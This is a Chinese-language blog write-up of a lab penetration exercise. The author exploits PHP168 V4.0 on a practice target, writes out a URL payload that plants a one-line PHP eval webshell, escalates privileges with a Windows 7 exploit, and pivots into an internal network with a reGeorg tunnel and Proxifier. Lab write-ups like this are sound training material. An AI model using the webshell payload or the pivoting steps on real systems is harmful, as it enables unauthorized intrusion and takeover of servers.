记一次内网渗透

0x01

这次是2组表哥们搭建的靶机,提示还有一个内网靶机。

0x02 信息收集

可以在网页的最底下看到相应的信息

1-1
一个2007年的网站,应该会有很多漏洞,百度了一下php168V4.0

果然存在漏洞:利用login.php文件,将一句话木马windy.php缓存到cache目录下。

payload:login.php?makehtml=1&chdb[htmlname]=wind.php&chdb[path]=cache&content=<?php%20@eval($_POST[admin]);?>

0x02 漏洞利用&&提权

执行后再去访问相应的php,没有404,说明我们构造的windy.php已经写入了。
1-2
既然已经有了一句话木马,我们就可以直接用菜刀链接到我们上传的php
1-3
和以前一样,并没有添加用户权限,后来表哥提供给我了一个win7提权的exp。

将对应版本的exe传入到靶机目录,按照格式执行命令即可。效果拔群!
1-4

内网代理

之后我们来看看内网的靶机。

我们需要通过我们刚刚拿下的靶机来进入内网,采用内网代理的方法。

查阅信息,得知了sock5代理(regeorg+proxifier)进入内网的方法。

regeorg可以直接从github获取,proxifier也有各种破解版。

regeorg建立本地到靶机端的链接,通过proxifier设置各种应用的代理。

先配置regeorg:

1.先将regeorg包下自带的tunnel.xxx传入靶机(这里是php运行的,所以我上传的是php)。

如果你访问你上传的网页,显示如下图,说明你可以进入下一步了
1-6
2.运行regeorg脚本,-p 为监听端口 -u 对应的tunne.xxx的地址

需要注意的是-u 对应的url一定要加入相应的协议头,否则就会报错。(当时在这一步卡了好久,甚至重装了好几次python)
1-7

报错信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Traceback (most recent call last):
File "reGeorgSocksProxy.py", line 412, in <module>
if not askGeorg(args.url):
File "reGeorgSocksProxy.py", line 373, in askGeorg
conn = httpScheme(host=httpHost, port=httpPort)
File "C:\Python27\lib\site-packages\urllib3\connectionpool.py", line 763, in _
_init__
**conn_kw)
File "C:\Python27\lib\site-packages\urllib3\connectionpool.py", line 166, in _
_init__
ConnectionPool.__init__(self, host, port)
File "C:\Python27\lib\site-packages\urllib3\connectionpool.py", line 69, in __
init__
raise LocationValueError("No host specified.")
urllib3.exceptions.LocationValueError: No host specified.

正确开启后这是样的
1-8

配置proxifier:

proxifier有两个需要配置的地方,一个是代理服务,一个是代理规则

这个只要按照之前regeorg中设置的配置填就好

但是一定要注意,代理规则的python一定不要打勾!python一定不要打勾!python一定不要打勾!
1-9

否则就会形成多重代理,类似死循环,导致服务端卡死orz。

进入内网

之后在内网寻找靶机,突然想起之前看的arp进行局域网攻击,所以用windows自带的arp命令查找了一下局域网的ip,arp -a
1-10
发现好像192.168.62.128符合我们的要求,直接浏览器访问。
1-11
成功进入内网的靶机。

这个网站并没有入侵思路。

用扫描器扫了一下,发现有一个123.php比较可疑,访问了一下,发现是一个大马,可能是哪个表哥留下的。
1-12
如果有那位表哥知道渗透思路的请务必告诉我orz。

参考文章: